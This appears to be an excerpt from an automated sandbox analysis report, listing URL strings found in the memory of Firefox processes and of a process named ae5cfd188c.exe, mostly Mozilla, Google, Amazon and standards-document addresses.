Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2822642036.000002BA5A07A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000018.00000003.2731037127.000002BA5C0F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C0F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000018.00000002.2832858012.000002BA5AC7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000018.00000003.2772758014.000002BA5C5A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: ae5cfd188c.exe, 0000000A.00000003.2689925143.0000000005531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: ae5cfd188c.exe, 00000007.00000003.2520361481.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2497811681.000000000564C000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2520653498.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2497934385.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631261345.0000000005465000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2655845392.0000000005465000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631088178.000000000546C000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2655035263.0000000005465000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: ae5cfd188c.exe, 00000007.00000003.2497934385.0000000005620000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631261345.0000000005440000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: ae5cfd188c.exe, 00000007.00000003.2520361481.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2497811681.000000000564C000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2520653498.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2497934385.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631261345.0000000005465000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2655845392.0000000005465000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631088178.000000000546C000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2655035263.0000000005465000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: ae5cfd188c.exe, 00000007.00000003.2497934385.0000000005620000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631261345.0000000005440000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A20A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A4DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/N&3
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A20A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A4DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A461000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://extensions/content/parent/ext-browserSet
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813831095.000002BA597AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2736817789.000002BA61F15000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2734749303.000002BA634DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2881483129.000002BA634D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2726304100.000002BA61D3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2722032655.000002BA61B30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000018.00000002.2818447104.000002BA59DD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2734749303.000002BA634DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2881483129.000002BA634D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2881483129.000002BA63403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
